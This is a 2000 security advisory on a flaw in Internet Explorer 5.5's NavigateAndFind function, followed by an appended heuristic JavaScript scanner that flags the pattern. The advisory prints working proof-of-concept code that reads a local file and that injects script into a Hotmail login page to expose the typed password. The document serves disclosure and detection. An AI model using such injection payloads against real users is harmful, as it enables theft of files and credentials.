SECURITYVULNS:DOC:749
Oct 06, 2000 - 12:00 a.m.

IE5.5 window.external.NavigateAndFind security vulnerability....


Multiple security vulnerabilities have been found in the
window.external.NavigateAndFind function in IE5.5…
After the most recent patches are applied, the
vulnerabilities seem to persist… Actually, there are no
current issues discussed at the Microsoft website…
Microsoft has been notified about the problem via
email… So far there has been no response.
I wanted to inform security-concerned people about
the problem…

Vulnerability 1: The window.external.NavigateAndFind
function can access local files, provided that the local
file name and path are known…

The code (the I in the script tag is replaced with
lowercase):

<A href="javascr!pt:LinkClicked()">Show local file's Content</A>
<SCRiPT>
function LinkClicked()
{
b=window.open("file://C:/test.txt","local")
setTimeout('Sniff()',1000);

}
function Sniff(){
window.external.NavigateAndFind("javascript:alert(document.body.innerText);","b","local");
}

</SCRiPT>
demonstration:
http://www.horoznet.com/AlpSinan/navAL.htm

Vulnerability 2: The window.external.NavigateAndFind
function can access other windows' DOM.
Editing the opened window's content, and therefore code
injection, is possible.
The code:

<A href="javascript:LinkClicked()">Go to Hotmail </A>
<scrIpt>
function LinkClicked()
{
a=window.open("http://lc2.law5.hotmail.passport.com/cgi-bin/login","new")
setTimeout('Spoof()',20000);// you may modify the timeout…

}
function Spoof(){
window.external.NavigateAndFind("javascript:document.write(''+document.body.outerHTML+'<scrIpt>document.passwordform.onsubmit=ShowPass;function ShowPass(){alert(\"Your Password is: \n \"+document.passwordform.passwd.value)};window.focus();</sc'+'rIpt>');alert('The code has been injected right now.');","a","new");
}
</scrIpt>
demonstration:
http://www.horoznet.com/AlpSinan/navCI.htm

Vulnerability 3:
IE5.5 can execute the JavaScript or VBScript content
of plain text files…
demonstration:
http://www.horoznet.com/AlpSinan/execlocal.htm

Possible precautions or workarounds are disabling
JavaScript or using caution when clicking links in
untrusted web pages as well as popup windows.

Alp Sinan
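
Added example (not part of the original advisory or its demonstrations): a heuristic JavaScript check that a content filter or page reviewer could run over page source to flag the pattern behind vulnerabilities 1 and 2, that is, a NavigateAndFind call whose URL argument uses a script scheme and whose target is a window the same page opened by name. The function names, result fields and sample pages are assumptions constructed for illustration.

```javascript
// Added example: heuristic static check, not a complete JavaScript parser.
// All names (scanPage, SAMPLE_*) are hypothetical.
const NAV_RE = /external\.NavigateAndFind\((["'])(javascript|vbscript):[\s\S]*?,(["'])([^"']*)\3\)/gi;
const OPEN_RE = /\.open\((["'])(.*?)\1,(["'])([^"']*)\3/gi;

// Remove whitespace so calls wrapped across lines still match.
function squash(src) {
  return src.replace(/\s+/g, "");
}

// Returns one finding per NavigateAndFind call whose URL argument uses a
// script scheme, correlated with windows the same page opened by name.
function scanPage(html) {
  const flat = squash(html);
  const opened = new Map(); // window name -> URL passed to window.open
  for (const m of flat.matchAll(OPEN_RE)) opened.set(m[4], m[2]);

  const findings = [];
  for (const m of flat.matchAll(NAV_RE)) {
    const target = m[4]; // third argument: name of the target window
    const url = opened.has(target) ? opened.get(target) : null;
    findings.push({
      scheme: m[2].toLowerCase(),
      target,
      targetUrl: url, // null when the page did not open that window itself
      localFile: url !== null && /^file:/i.test(url),
    });
  }
  return findings;
}

// Constructed sample pages (not taken from real traffic).
const SAMPLE_LOCAL = `<script>
b = window.open("file://C:/test.txt", "local");
window.external.NavigateAndFind("javascript:void
(0);", "b", "local");
</script>`;
const SAMPLE_REMOTE = `<script>
a = window.open("http://mail.example.test/login", "new");
window.external.NavigateAndFind("JavaScript:void(0);", "a", "new");
</script>`;
const SAMPLE_BENIGN = `<script>
window.external.NavigateAndFind("http://example.test/doc.htm", "term", "_main");
</script>`;

console.log(scanPage(SAMPLE_LOCAL), scanPage(SAMPLE_REMOTE), scanPage(SAMPLE_BENIGN));
```

A finding with localFile set corresponds to the local-file case in vulnerability 1; a finding with a non-null http targetUrl corresponds to the cross-window case in vulnerability 2.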